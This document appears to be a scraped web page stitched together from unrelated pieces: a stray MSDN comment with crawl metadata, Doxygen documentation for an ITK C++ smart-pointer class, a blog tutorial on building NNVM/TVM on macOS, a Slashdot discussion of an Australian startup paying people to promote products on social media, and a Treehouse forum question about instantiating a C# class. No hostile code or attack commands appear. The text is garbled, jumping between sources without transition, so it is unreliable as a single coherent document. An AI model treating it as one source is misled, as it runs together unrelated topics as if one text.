Thanks for the feedback. We are tracking this bug internally -- don't have any other status right now. | http://blogs.msdn.com/b/ptorr/archive/2010/10/30/that-memory-thing-i-promised-you.aspx | CC-MAIN-2014-15 | refinedweb | 313 | 56.76 |
#include <itkFEMP.h>
List of all members.
FEMP holds a pointer to objects of class T and its derived classes. it behaves like a special kind of pointer. Special pointers to object can be used to store polymorphic arrays in STL. The basic idea of the special pointer is: whatever you do to the pointer (object of class FEMP), is also reflected on the object within (pointed to by m_Data member). For example: if you copy the special pointer, an object within is also copied.
Class T should have a member Clone() which produces a copy of an object. This is important in polymorphic classes, where object of the derived class should be created when copying an existing object.
Class T should also include typedefs T::Pointer and T::ConstPointer that define standard pointers to the class. Note that these could be SmartPointer classes.
Definition at line 46 of file itkFEMP.h.
Copy constructor. Clone() method is called to duplicate the existing object.
Definition at line 63 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data.
Conversion constructor from T::Pointer to FEMP<T>. The object T* must exist and we take ownership of object T*. If you want to create a copy of object and take ownership of that, use: FEMP(x->Clone()) instead of FEMP(x).
Definition at line 76 of file itkFEMP.h.
Copy constructor. Clone() method is called to duplicate the existing object.
Definition at line 63 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data.
Asignment operator
Self assignments don't make sense.
First destroy the existing object on the left hand side
Then clone the one on the right hand side of the expression (if not NULL).
Definition at line 131 of file itkFEMP.h.
References itk::fem::FEMP< T >::m_Data. | http://www.itk.org/Doxygen38/html/classitk_1_1fem_1_1FEMP.html | crawl-003 | refinedweb | 299 | 68.57 |
NNVM is a new deep learning framework introduced by DMLC. NNVM is a compiler for deep learning. This is the point which differentiate NNVM from other existing deep learning frameworks such as TensorFlow. NNVM compiles given graph definition into execution code. Of course TensorFlow can also do same thing. But we need to write graph definition in TensorFlow manner. NNVM is a runtime agnostic compiler. If you familiar with LLVM, you may know what I mean.
NNVM provides
Once you write a graph definition, it can be optimized on various kind of hardwares. This architecture is just similar to the frondend and backend of LLVM compiler. We can find Caffe, Keras, MXNet, PyTorch, Caffe2 and CNTK is now supported as frontend of NNVM, which means if you already have a graph definition in these frameworks, you can run it by using NNVM.
Graph definition is first compiled into an original intermediate representation called TVM IR. TVM syntax looks very similar to the API in TensorFlow.
import tvm n = tvm.var("n") A = tvm.placeholder((n,), name='A') B = tvm.placeholder((n,), name='B') C = tvm.compute(A.shape, lambda i: A[i] + B[i], name="C") print(type(C))
You write a graph definition in TVM. Then it is compiled into the code runnable on target device.
fadd_cuda = tvm.build(s, [A, B, C], "cuda", target_host="llvm", name="myadd")
Since TVM only provides very primitive kernel API, NNVM is the framework we use for deploying a complex deep learning model on production.
This is the post to explain how to build NNVM on your laptop. My local machine is macOS Sierra 10.12.6.
Though you may not need to do this depending on your target device and frontend, it’s recommended to install them anyway. Protocol buffer is required by ONMX.
$ brew install protobuf llvm
Check out first. NNVM includes several submodules such as TVM to be built together. Please make sure to add
--recursive option.
$ git clone --recursive
We build TVM first.
$ cd nnvm/tvm $ mkdir build $ cd build $ cmake .. $ make
You will find artifacts
libtvm.dylib and
libtvm_runtime.dylib if it finished successfully. Then we build python interface of TVM.
$ cd ../python $ python setup.py install $ cd ../topi/python $ python setup.py install
Finally we can build NNVM source code.
$ cd nnvm $ make $ cd python $ python setup.py install --user
Adding library path is necessary to let Python find required libraries for NNVM.
export PYTHONPATH=/path/to/nnvm/python:${PYTHONPATH} export LD_LIBRARY_PATH=/path/to/nnvm/tvm/build:${LD_LIBRARY_PATH}
Then you can run NNVM program through Python interface.
> python Python 3.6.0 |Anaconda 4.3.1 (x86_64)| (default, Dec 23 2016, 13:19:00) [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import nnvm TVM: Initializing cython mode... >>>
What to be noted here is that we need to rebuild TVM and NNVM if you change the target device where the program is deployed. | https://www.lewuathe.com/compiling-nnvm.html | CC-MAIN-2018-26 | refinedweb | 502 | 70.19 |
hello,
yes - fedora uses javac for the compiler - that comes with eclipse
Hi,
I am using Fedora core 5 32+ bit as my os on the pc. I want to learn Java a bit on my own. Can I compile Java code from the terminal itself? I am not used to any particular IDE at the moment so terminal seems to be the best way forward as I have been doing this with my sample C++ codes as well. I would appreciate any further guidance in terms of what is the best way to start programming in Java on Fedora platform. Thanks a lot gentlemen.
hello,
yes - fedora uses javac for the compiler - that comes with eclipse
telnet mtrek.game-host.org 1701
And some good books which I recommend:
The Java tutorial from Sun microsystems.
Core Java Vol I,II. again from Sun microsystems.
The first one is free to download from Sun.com, but the other ones are not free.
Good luck with Java.
This will be over soon, and then I can ...
1. I agree that I need to go for JDK, but if I try the following in a terminal this is what I get as a result of running the command:
[root@localhost ~]# yum install java
Setting up Install Process
Setting up repositories
dries [1/6]
dries 100% |=========================| 951 B 00:00
core [2/6]
core 100% |=========================| 1.1 kB 00:00
updates [3/6]
updates 100% |=========================| 1.2 kB 00:00
freshrpms [4/6]
freshrpms 100% |=========================| 951 B 00:00
macromedia [5/6]
macromedia 100% |=========================| 951 B 00:00
extras [6/6]
extras 100% |=========================| 1.1 kB 00:00
Reading repository metadata in from local files
Parsing package install arguments
Nothing to do
As it says 'nothing to do', should I automatically assume that the native support for Java for my Fedora core 5 os is now enabled? Is this action (running the command yum install java) going to affect the successful running of Java on my pc after I install the necessary stuff from Sun website?
2. Now I have already run the command 'yum install java', so I tried to see if it was installed by typing this command which I am quite unsure of.
[root@localhost ~]# rpm -qi java
package java is not installed
Here it says 'package java is not installed'. What does this suppose to mean?
3. I have been looking around the net on various Linux forums and people have been telling me different things when I ask a simple question like what actually I need to download from Sun's site to run Java perfectly. Some are saying that I need only one thing and that is JRE, not JDK.
So I searched on the net and came across this page for Linux download for Java. It does not say whether it is JRE or JDK.
I just downloaded the file Linux RPM (self-extracting file) filesize: 17.67 MB and followed this page for the installation of it.
Now when I type this command in a shell this is what I get:
[root@localhost ~]# rpm -qi jre
Name : jre Relocations: /usr/java
Version : 1.6.0_01 Vendor: Sun Microsystems, Inc.
Release : fcs Build Date: Wed 14 Mar 2007 10:56:32 AM GMT
Install Date: Sun 27 May 2007 01:50:40 PM BST Build Host: jdk-lin-1586
Group : Development/Tools Source RPM: jre-1.6.0_01-fcs.src.rpm
Size : 45843609 License: Sun Microsystems Binary Code License (BCL)
Signature : (none)
Packager : Java Software <jre-comments@java.sun.com>
URL :
Summary : Java(TM).
So this means that JRE is installed properly on the system then? Or does it mean that I no longer need JDK?
I am sorry for the length of the post, but I hope that someone like you can clarifiy the doubts and confusions that are bothering me at the moment. Thanks....
First of all when you include commands in your posts use code tag.
You can download JDK from here.
You can also download NetBeans from that link. It is a very powerfull IDE for Java.
Aftre you downloaded the file install it, and add the java's compiler path to the PATH environment variable too. If you encountered any problems post them here (remember the code tag
).).
This will be over soon, and then I can ...
JDK 6u1
JDK 6u1 with Java EE
JDK 6u1 with NetBeans 5.5.1
and the one that you have mentioned as NetBeans is the third on the page ie
JDK 6u1 with NetBeans 5.5.1
From the page :
Right?
Thanks for the help I just needed some proper guidance then I will be alright.
I think this is the one with NetBeans then:
Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1)
and here is the page:
Linux Platform - Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1)
Java SE Development Kit and NetBeans IDE Cobundle (JDK 6u1 / NB 5.5.1), Multi-language jdk-6u1-nb-5_5_1-linux-ml.bin 140.61 MB
Just installed it ie JDK 6u1 with NetBeans 5.5.1
but when I try to compile a small file called james.java saved in a folder called PracJava on desktop, from the terminal with the following commands it for some reason gives the following error:
Here is the cod of the file named james.javaHere is the cod of the file named james.javaCode:[root@localhost ~]# cd Desktop/PracJava [root@localhost PracJava]# javac james.java /usr/bin/javac: line 3: java: command not found [root@localhost PracJava]#
Can some one suggest me something?Can some one suggest me something?Code:public class google { public static void main(String args[]) { System.out.println("Hello Mr. Bond, nice to see you!"); } }
Thanks
i just did the following
One thing here is strange, libjavaplugin_oji.so is flashing in a red background. Is it some kind of error that needs to be corrected?One thing here is strange, libjavaplugin_oji.so is flashing in a red background. Is it some kind of error that needs to be corrected?Code:[root@localhost ~]# su [root@localhost ~]# whereis netbeans netbeans: /opt/netbeans-5.5.1/bin/netbeans [root@localhost ~]# cd /opt [root@localhost opt]# ls jdk1.6.0_01 jre-6u1-linux-i586-rpm.bin netbeans-5.5.1 jre-6u1-linux-i586.rpm libjavaplugin_oji.so [root@localhost opt]#
Thanks...
Sorry for being late, I couldn't access internet in the last 24 hours
In Java programs the name of the file containing the main function must be the same as the class containing the main function. In this case it must be google.java not james.java.
And have you added the path containing the java program to the PATH environment variable?
This will be over soon, and then I can ...
Bookmarks | http://www.linuxhomenetworking.com/forums/showthread.php/17940-Compiling-Java-in-a-terminal?p=137588&viewfull=1 | CC-MAIN-2013-20 | refinedweb | 1,147 | 74.29 |
Cash For Tweets and Facebook Posts? Aussie Startup Pays You to Astroturf 156
An anonymous reader writes "While the celebs are already charging big money for their Tweets, an Aussie startup is ranking everyday people and turning them into product salespeople. After a successful start Down Under they have now hit Silicon Valley, but will Americans embrace selling to their friends?" From the article: "In a nutshell, individuals sign up to the Social Loot website and are assigned companies to promote to their circle of online friends. They are then paid on a sliding scale based on the amount of traffic their posts generate, and the quality of referrals and number of resulting sales. This is tracked by a code embedded in the links promoted by Social Loot’s spruikers."
This should be considered illegal (Score:5, Insightful)
This is advertising. It is also a lie. That's fraud, plain and simple.
Re:This should be considered illegal (Score:5, Insightful)
The same should apply to tweets. They are broadcasts, and so the people making them should disclose whether it is advertising or not.
Re: (Score:1)
Can't have it both ways. Either free speech, paid or not, or, a form of censorship. Because someone will have to be enforcing the disclosure requirement. and that someone would _have_ to be given authority to investigate any twitterer. On the scale of the internet this is _insane_.
Re: (Score:2)
Re: (Score:3)
It's just a matter of time til everyone knows twitter is for suckers that want to read a bunch of really short astroturf
About minus four years?
Re:This should be considered illegal (Score:5, Interesting)
You make a good point. When the Alan Jones cash for comments scandal broke, he got absolutely slammed in court for not disclosing who was paying him to promote various things on his show. The same should apply to tweets. They are broadcasts, and so the people making them should disclose whether it is advertising or not.
Or you could just not be friends with people who will spam you with crap so they can earn 8 cents a week.
Re:This should be considered illegal (Score:4, Insightful)
You dont understand ho astroturfing works. The goal is transparency and deception. Astroturfing appears as opinion, but is actually scumbag capitalism.
Re: (Score:2)
You dont understand ho astroturfing works. The goal is transparency and deception. Astroturfing appears as opinion, but is actually scumbag capitalism.
As I understand it, astroturfing doesn't work without people to participate in the process. Don't be friends with those people and you won't have to wonder whether you're hearing opinion or advertising.
Re: (Score:3)
The point is that the entire of goal of astroturfing is to make it as hard as possible to distinguish astroturf from genuine opinion. If you can't tell the difference then you can't unfriend only the astroturfers. Especially when the astroturfer realyl is genuine 90% of the time and only schills on rare occasion.
Re:This should be considered illegal (Score:4, Informative)
This one relies on embedded codes in their URLs to measure their effectiveness ; it wouldn't be difficult to detect.
Re: (Score:2)
Re: (Score:3)
You don't have to, there's various "un-shortening" and "URL lengthening" services, along with plugins for pretty much every browser, available that do it for you, often fully transparently.
Re: (Score:2)
do this the simple way and if you run FireFox load the "long Url Please" addon
Transparency? (Score:2)
Quit the opposite, actually.
Re:This should be considered illegal (Score:4, Insightful)
Re: (Score:2)
Wtf? reactionary hyperbole?
Re: (Score:2)
Re:This should be considered illegal (Score:4, Interesting)
Just unfriend such so called "friends" (Score:4, Insightful)
After politely warning them to cease such activity. I cannot understand why there are so many people that want to involve the government in everything, which is what happens when you advocate something you don't like should be made illegal.
Re: (Score:2)
Re: (Score:2)
A government that doesn't protect the 99% from the 1%, who have consistently shown themselves to embody the most pernicious, sociopathic forms of Randism (which is all of them), is no government worth having.
Re: (Score:2)
Re: (Score:2)
How do you know Microsoft Office respects your privacy, do you have access to the source? From what I've heard Microsoft at the very least keeps track of the hardware on which you run its software.
Re:This should be considered illegal (Score:4, Informative)
How do you know Microsoft Office respects your privacy, do you have access to the source?
You don't need it. It runs on your local machine, so you can check every network connection that it makes and, more importantly, you can trivially prevent it from making any network connections.
From what I've heard Microsoft at the very least keeps track of the hardware on which you run its software.
And the reason you know this (it's related to Windows Update, not MS Office specifically) is that people did intercept the data sent to Microsoft from Windows Update and found out exactly what was being sent.
Re: (Score:2)
You don't need it. It runs on your local machine, so you can check every network connection that it makes and, more importantly, you can trivially prevent it from making any network connections.
I'm not saying office does anything but malicious, but it would be trivial for Microsoft to put a backdoor in their own OS.
Re: (Score:2)
Assuming they are incompetent.
For example, the 'microsoft update' scheme is as I understand it run on an unencrypted protocol.
There would be nothing stopping office telling the update client to send a few bytes of data along with that stream.
Re: (Score:2)
Re: (Score:2)
Privacy Policies don't exist at the moment in a complicated form to help you or define your rights. it's for legal indemnity for any company that has them if it's more than 8-10 sentences long.
Re: (Score:3)
I admit I'm very impressed! I know I'm sticking my neck out depending on the eyes of many others to verify that open source programs such as libreoffice respect privacy, but you relying on the output of a disasembler to reveal all potential downfalls of a program all by your lonesome far exceeds my meager abilities. My hat is off to you!
Re: (Score:2)
using Microsoft.IO.Evil
...
//Phone Home Module ------ Mwahaha
public class PhoneHomeMessenger(string firstName, string lastName, string creditCardNumber, List secretWebcamPhotos)
{
.... }
Re: (Score:2)
I just knew you'd be here, blowing smoke up Microsoft's arse or slamming Google for something unrelated.
How much do you get paid for this bullshilling you have been doing now for such a long time under oh-so-many different accounts?
Do you look forward to the competition from Social Loot, or do you work for/through them now?
Anyway, good work - any pay you receive is too much as you are such an obvious shill.
And, before you protest that you don't get paid -- well if that's true then you need psych help; but
Re: (Score:2)
Re: (Score:1, Offtopic)
Phew. Thank you for reminding me to bump up my threshold after moderation.
Re: (Score:3)
Since when is pitching products illegal. It's not something I'd do to my friends for products I don't believe in though.
Re: (Score:2)
It's specifically an Australian company. Australia does have some rules about having to disclose when you are being paid to say something.
They apply to the media, but who knows when a court will decide that a tweet is the same as a hosting a radio show.
Re:This should be considered illegal (Score:5, Insightful)
This has nothing to do with selling product. This is all about corruptly flooding forums with trolls, thousands of them. The marketing and promotional lie is selling products to friends the reality is poisoning every possible social network with an endless stream of bullshit marketing.
How long will an social site's last when you have a couple of hundred thousand trolls flooding the site with links, desperate to collect a couple of cents per click.
The guy is nothing but another mass trolling pig. Doesn't give a crap about people's social interactions, quite happy to bring them all crashing down, basically he wants to become a social forum spammer and that's what the arse hole is selling to corporations.
You can filter out some IP's but not hundreds of thousands of scattered ones, you can block robots but not hundreds of thousands of pathetic greedy ignorant trolls.
A purveyor of lies on a mass scale. Of course the trolls he employs will become the most hated people on the internet, kicked out of social network after social network.
Re: (Score:2)
Are you telling me that this is gonna kill Facebook and Twitter? Really? REALLY?
Naa, you're just saying it to make me happy!
Re:This should be considered illegal (Score:5, Interesting)
In previous years, usenet was a social gathering ground on the internet.. being unmoderated was its strength, but also its weakness and Canter & Siegel started a movement that killed it eventually. This has the capability to kill off twitter and facebook sure, but since they both have a controlling entity who could institute moderation then perhaps they can stave off demise by some quick thinking..
Re: (Score:2)
It's not Facebook or Twitter that need to react. It's the people who receive the message. I unfollow and unfriend people who post pointless spam, that's the solution. People lose their audience and soon they are worth nothing.
Re: (Score:2)
Which doesn't really matter on a social network. I have a limited number of contacts. If the filters the site use don't work then it's a few seconds work for me to ignore or remove the person who posted it. People have been doing company sponsored advertising for years, the get a free iPad links being one of the more recent examples. Some people
Re: (Score:3)
The guy is nothing but another mass trolling pig. Doesn't give a crap about people's social interactions, quite happy to bring them all crashing down, basically he wants to become a social forum spammer and that's what the arse hole is selling to corporations.
The world you're looking for is capitalist or "job creator" if you're Republican. This is practically the history of corporations. Find a new untapped resource and spoil it for everyone else by monetising it in the filthiest way possible until the "evil government" steps in to protect people from the "upstanding businessman" who is "creating wealth".
I fully agree with you, Facebook and Twitter will be entering a war with companies like this if they know what's good for them. This is really no different f
Re: (Score:2)
Don't worry about Facebook (or, in my case, don't get your hopes up).
What will happen is simply this: FB will notice that there are people getting paid to spill crap. They'll change their TOS and forbid shilling (at least if you don't pay them for it), a few people will get their account banned and everyone else will cower in fear of being the next and the whole crap stops.
What's left is the "professional" shills. Just like you have today.
Re: (Score:2)
How long will an social site's last when you have a couple of hundred thousand trolls flooding the site with links,...
They seem to be coping just fine at the moment.
Re: (Score:2)
Re:This should be considered illegal (Score:5, Funny)
Re: (Score:2)
This is advertising. It is also a lie. That's fraud, plain and simple.
What if I post my dropbox referral code? I don't get anything but free space.
Ahem - hey, I like dropbox, check it out! [db.tt] Sign up with that code and you get 500 megs free too!
lol. It's funny because it's true.
Re: (Score:2)
This is advertising. It is also a lie. That's fraud, plain and simple.
Kill it before it multiplies. Hang and eviscerate on site.
Re: (Score:2)
Re: (Score:2)
Damn rite... Its a sham two sea that people don't no their language and it's spelling rules...
Re: (Score:2)
This will fall under what I call "affiliate marketing laws" and the FTC is very serious about them. Go read their website (the ftc) and you'll see how many people and companies they've sued recently.
Re: (Score:2)
Re: (Score:2)
Re: (Score:2)
Hush! If anyone from the IRS hears you they want some virtual property tax or similar bull.
oh no here come shills, (Score:2)
i quit reading facebook update because of all of the adds for different games and crap on facebook. all i wanted was to know what my freinds who do not live near me where doing in meatspace now all there is are posts of "look at this funny/inspirational/religious/photoshopped picture some else posted i and i am reposting" and "i am playing a flash game you need to play the flash game to" i don't want to see more freaking adds. can we a decrapafied section of the Internet where we all agree that any spammer
Re: (Score:1)
While I agree with your overall point, you shouldn't post when drunk.
Re: (Score:2)
Working on it. First thing to fix: the search engine. I think Google has gotten all the money they are possibly going to get at this point from overlooking SEOs, and should start delisting all of them immediately. Ask the founders to try and find something using their own search engine; when they find it littered with ads, perhaps they will feel motivated to find a way to fix it.
On a separate note, I've been equally annoyed about the Web 2.0, sell your Facebook friends, kind of thing. I have a few friends w
Re: (Score:3)
Re: (Score:2)
I don't really use Facebook so I can't give you a specific guide but you can just filter out all that stuff so only 'real' posts appear on your page.
on a totally unrelated unbiased note (Score:5, Funny)
Social Loot has the best service to offer so far. We testet all the available options besides Social Loot and Social Loot is the winner for us. Social Loot.
Re: (Score:2, Redundant)
+5 Funny
Re:on a totally unrelated unbiased note (Score:5, Insightful)
Re: (Score:2)
Ah, excellent... (Score:5, Insightful)
With any luck, this should allow automated recognition of people who are astroturfing for these guys and it's always good to have a new way of identifying awful people. At a service level, the astroturf can then be removed, downranked by search engines, etc. At a personal level, we can each do our part by reminding those culprits we know that spammers are abhuman scum who go to the special hell, and deserve it.
Re: (Score:2)
Re: (Score:2)
Not really, most of them will probably be companies you never would have heard of otherwise. This is probably going to work on the same principle as spam. They'll post a million shill messages and if they sell 4 of the product, it'll be consider a "success".
Ah-ha! (Score:2)
I was wondering why all my friends suddenly started trying to get me to buy a 747 with a big laser on it.
Re: (Score:2)
i would like a shark with a fricking laser on it.
sue them (Score:1)
So, is it age related or IQ related... (Score:2)
I can see it both ways - the youth will be jaded with familiarity about how the world works (wait - new patent idea = "how the worlds works + ON THE INTERNET") vs the wisdom of the more experienced... I don't have a good sample - my kids, are, well, young(er) AND smart, so I have confounding factors in my data points... but they don't believe half the shit on the Internet as it is. How old is the phrase "caveat empt
In Britain... (Score:5, Funny)
Re:In Britain... (Score:4, Funny)
In the US, we can call it 'Prostituting for Pennies'.
Re: (Score:2)
In Poland, we call it "Peddling for Pebbles".
Futurama new this day would come (Score:1)
Innovative new spam ideas! (Score:1)
Block It (Score:5, Informative)
I don't know about Twitter at least, but on Facebook, all the posts came from the Social Loot application. It took all of 5 seconds to "block all posts from Social Loot" to my wall, and now I need never know of its existence (except for Slashdot - thanks guys).
Re: (Score:1)
Re: (Score:1)
#
/etc/hosts
#
#
127.0.0.1 localhost twitter.com fb.com facebook.com
... ...
No more trust. (Score:4, Interesting)
Great. So now when a friend or acquaintance says something nice about a product or service, I won't be able to trust their opinion because I won't know if they were paid to say it or not.
Nice job polluting Twitter and other sites with stupid marketing and more distrust in what people say. It's freaking bad enough already.
Re: (Score:2)
If they are the kind of friend who would push products on you just because they are getting paid then you probably couldn't trust their opinion anyway. Now at least you know. The friends who give you a well reasoned recommendation or information about their personal experience with a product / service can probably be trusted. The 'friends' who send you a referrer link out of the blue probably can't.
Re: (Score:2)
I find it interesting that you would call someone you don't trust and know "friend."
The people I call "friend" (as opposed to what Facebook says) are trustworthy. I wouldn't hang around them if they weren't.
Re: (Score:2)
DOH!
Re: (Score:2)
You will be able to tell by looking at the address in the address bar after you have followed the link. If it is a standard product page link then great, if it has a load of referrer cruft tagged on to the end of it then you may want to take the recommendation with a pinch of salt.
At the end of the day you can either trust your friends and therefore be safe in the assumption that they have your best interests at heart, or you can't.
Re: (Score:2)
As mentioned earlier in this thread, there's an app
... erhm ... addon for that: Long URL Please Firefox Addon [mozilla.org]
Good for them! (Score:3)
If social media websites are making a mint off of harvesting personal information, it's high time their users started seeing some money as well.
It's up to the service providers to police their own services, and I feel no pity for them.
Cash for twits. (Score:2)
...are assigned companies to promote to their circle of online friends.
What a load of crap. "Go promote this crap you may or may not have used or like, and we'll pay you".
I know not everyone shares my belief on this, but the only way I'll endorse or promote your product is if I believe it's a good product and a good value. Mostly, that means I personally use your product and like it, but there are some cases where I know a product is good and popular, but doesn't serve my needs. In that case, I'll still recommend it to people I think will benefit from it. If I don't know your
Re: (Score:2)
I'd be willing to do this (Score:2)
I'd be willing to do this just as soon as I develop a new set of friends that I don't care about, so I don't have to lose the friends I actually like!
:)
Re: (Score:2)
Cash in no matter what? (Score:3)
Anything I write must tickle at least someone's fancy.
Either I like a product, it makes the company happy, or I don't like it, it makes their competition happy.
So either way, I should get my money right? No need to get influenced by money.
Can I cash in retrospectively for all the things I ever wrote? There must be a lot of money in there. Just need to pitch it to the right 'clients'. $_$
Quickly Squelched (Score:4, Insightful)
People have a very low tolerance personal space intrusions. People on the whole have a pretty decent intuition on whether someone genuinely is recommending something vs. is being paid to do so. People also have a pretty good intuition on figuring out who is a paid shill. Anyone who seriously tries to make money from this will quickly find themselves without friends. I can't think of a single friend of mine that would tolerate this shit on their feeds. I hope this gains traction as it will be a quick and easy way to thin out the online social circle.
If this catches on (it won't), you'll just end up with a circle of technically ignorant folks circle-jerking each other for ad revenue while the rest of us get on with our lives.
Let the advertisers know what you think (Score:5, Interesting)
I just emailed Minidisc Australia and Social Loot sales this email:
---
Hi guys
I'm a previous customer of yours (I purchased a Cowon J3 a couple of years ago, order no 40580), and previously I've recommended other people buy stuff from you.
I note that you are now using Social Loot advertising (having come across this company via slashdot post): [socialloot.com]
My opinion is that the kind of 'shill advertising' promoted by Social Loot is about as low as it gets. As a result, I will:
a) no longer be recommending you, in fact I will be recommending against purchasing from you (and will explain my reasoning regarding the use of Social Loot)
b) no longer consider you for future purchases for myself
I realise I'm just one person. However, I am the 'go to guy' for a number of relatives and friends for technology matters, and based on past experience I am pretty sure that this will cost you a sale every three months or so. Over the course of one year I would estimate lost revenue at AUS$500 - AUS$1000.
If you stop using Social Loot advertising I will be happy to reverse my decision on this matter. Please note I've also cced this email to the Social Loot sales email address - unlike them, and apparently you, I am fine with being honest about my opinions.
Regards
Mike Both
----
If enough people do this, it could make a difference.
Re: (Score:2)
However the old fart cynic in me says: Good luck competing with "A current affair" and "Today tonight" who have both been shilling these kind of "pocket money" schemes for at least a decade. Then there's "Australia's most read columnist", Andrew Bolt, a shill for God in an Akubra
This is obviously spam-for-hire (Score:5, Informative)
1. Block all email to/from socialloot.com. (This might need updating if they register additional domains to avoid blocking. A very common spammer tactic is to use sequentially numbered domains, e.g., example01.com, example02.com, example03.com.)
2. Firewall out 122.252.6.0/24. Make the block is bidirectional so that nobody on your network can reach their allocation. (This will probably need updating if they receive an additional allocation.)
3. If you run a DNSBL or RHSBL, list the domain and the network allocation. If you maintain a list of spammer/phisher/abuser domains, add the domain.
4. If you run an ISP or similar operation, make it a policy that any user participating in this scam will be terminated immediately. Same for mailing lists, web forums, newsgroups, etc.
5. Do not hire anyone who has ever worked for socialloot.com. Make sure that words spread that working for spammer Gary Munitz is toxic.
Profit (Score:2)
Why I left FB (Score:2)
This is one of the reasons I quit Facebook, and why I think FB will eventually tank. It won't be long before your wall ends up being nothing but dozens of "posts" from your friends breathlessly raving about cheese-stuffed-something-or-other, or toilet bowl cleaner. Because eventually, if you are on FB, everything you buy is going to be announced to all your FB friends in this way, whether you like it or not.
Re: (Score:2)
It won't be long before your wall ends up being nothing but dozens of "posts" from your friends breathlessly raving about cheese-stuffed-something-or-other, or toilet bowl cleaner.
If friends start barking ads, they'll soon find themselves friendless.
Regional word: spruiker (Score:2)
I'd never heard of a "spruiker" before. Had to google it. Still have no idea how to say it.
Re: (Score:2)
Re: (Score:2)
Financially desperate and/or greedy people who cling to the last delusion will always be attracted to the accountanting equivalent of perpetual motion.
Re: (Score:2)
"Hopefully this becomes widespread enough to inject enough noise into the signal that is Facebook's personally-focused ad targetting."
Neat experiment.
:) | https://news.slashdot.org/story/12/04/30/2353237/cash-for-tweets-and-facebook-posts-aussie-startup-pays-you-to-astroturf | CC-MAIN-2017-26 | refinedweb | 4,335 | 71.14 |
I am training my models from
Google Collab with
batch_size = 128 after 1 epoch it has this problem. I don’t know have to fix it with the same batch_size (reduce batch_size to 32 can avoid this problem). Here is Colab spec:
driver Version: 460.32.03 CUDA Version: 11.2
You can find my notebook here.
Thanks for your help.
RuntimeError: CUDA error: CUBLAS_STATUS_INVALID_VALUE when calling `cublasSgemm( handle, opa, opb, m, n, k, &alpha, a, lda, b, ldb, &beta, c, ldc)`
I am training my models from
It seems that one of your operands is too large to fit in int32 (or negative, but that seems unlikely).
I thought that recent PyTorch will give a better error (but don’t work around it):
import torch LARGE = 2**31+1 for i, j, k in [(1, 1, LARGE), (1, LARGE, 1), (LARGE, 1, 1)]: inp = torch.randn(i, k, device="cuda", dtype=torch.half) weight = torch.randn(j, k, device="cuda", dtype=torch.half) try: torch.nn.functional.linear(inp, weight) except RuntimeError as e: print(e) del inp del weight
at::cuda::blas::gemm<float> argument k must be non-negative and less than 2147483647 but got 2147483649 at::cuda::blas::gemm<float> argument m must be non-negative and less than 2147483647 but got 2147483649 at::cuda::blas::gemm<float> argument n must be non-negative and less than 2147483647 but got 2147483649
But they don’t work around it. (It needs a lot of memory to trigger the bug…)
Maybe you can get a credible backtrace and record the input shapes to the operation that fails.
Best regards
Thomas
So what can I do to solve this problem, I just know to change batch size to smaller.
In order of difficulty:
- make batch size smaller,
- make a minimal reproducing example (i.e. just two or three inputs from torch.random and the call to the torch.nn.functional.linear) and file a bug,
- hot-patch torch.nn.functional.linear with a workaround (splitting the operation into multiple linear or matmul calls),
- submit a PR with a fix in PyTorch and discuss whether you can add a test or whether it’d take a prohibitive large amount of GPU memory to run (or hire someone to do so).
Best regards
Thomas
Thank for your help.
For the peoples getting this error and ending up on this post, please know that it can also be caused if you have a mismatch between the dimension of your input tensor and the dimensions of your nn.Linear module. (ex. x.shape = (a, b) and nn.Linear(c, c, bias=False) with c not matching)
It is a bit sad that pytorch don’t give a more explicit error messages.
@Jeremy_Cochoy This was really helpful. Solved my issue.
@Jeremy_Cochoy Thanks for your comments!
@Jeremy_Cochoy Thanks!
Hello @Jeremy_Cochoy
I have added an nn.Linear(512,10) layer to my model and the shape of the input that goes into this layer is torch.Size([32,512,1,1]). I have tried reducing the batch size from 128 to 64 and now to 32, but each of these gives me the same error.
Any idea what could be going wrong?
I think you want to transpose the dimensions of your input tensor before and after (Linear — PyTorch 1.9.0 documentation say it expect a Nx*xC_in tensor and you give him a 32x…x1 tensor)
Something like
linear(x.transpose(1,3)).transpose(1,3) ?
Thanks a lot also solved my Issue!
I got the same error because of a mismatch of the input dimensions in the first layer.
Thanks for the hint!
helped me! thank you!
hello all,
I had this problem while I was using a smaller batch size (=4) for testing some code changes, while my initial batch size was 64. I checked the shapes for
nn.Linear and they matched
After 1 hour I found that the only change was the batch size. By increasing batch size back to 64 everything worked perfectly. Pytorch version 1.8.1. Not sure why this error is caused.
Hope it helps!
Thanks a lot! Solved my issue. | https://discuss.pytorch.org/t/runtimeerror-cuda-error-cublas-status-invalid-value-when-calling-cublassgemm-handle-opa-opb-m-n-k-alpha-a-lda-b-ldb-beta-c-ldc/124544 | CC-MAIN-2022-27 | refinedweb | 695 | 74.39 |
Java - two types of data types in Java which are categorized below:
- Primitive Data Types: This includes boolean, char, byte, short, int, long, float and double.
- Non-primitive Data Types: This includes String, Interfaces, Classes etc.
Primitive Data Types
The below table describes primitive data types of Java in detail:
The below example shows how to create different primitive data types in a Java program.
public class MyClass { public static void main(String[] args) { boolean i = true; char j = 'A'; byte k = 10; short l = 10; int m = 10; long n = 10L; float o = 10.5f; double p = 10.5d; //printing data types System.out.println("i is a boolean. i = " + i); System.out.println("j is a char. j = " + j); System.out.println("k is a byte. k = " + k); System.out.println("l is a short. l = " + l); System.out.println("m is an int. m = " + m); System.out.println("n is a long. n = " + n); System.out.println("o is a float. o = " + o); System.out.println("p is a double. p = " + p); } }
The output of the above code will be:
i is a boolean. i = true j is a char. j = A k is a byte. k = 10 l is a short. l = 10 m is an int. m = 10 n is a long. n = 10 o is a float. o = 10.5 p is a double. p = 10.5 | https://www.alphacodingskills.com/java/java-data-types.php | CC-MAIN-2021-04 | refinedweb | 233 | 72.83 |
William Steele1,739 Points
Instantiation
How do I declare the frog class and give it a name at the same time, tried doing it the way it showed in video but said it was wrong and have been messing around but not finding anything
namespace Treehouse.CodeChallenges { class Program { static void Main() { new Frog == Frog 'mike' } } }
namespace Treehouse.CodeChallenges { class Frog{} }
2 Answers
Antonio De Rose20,859 Points
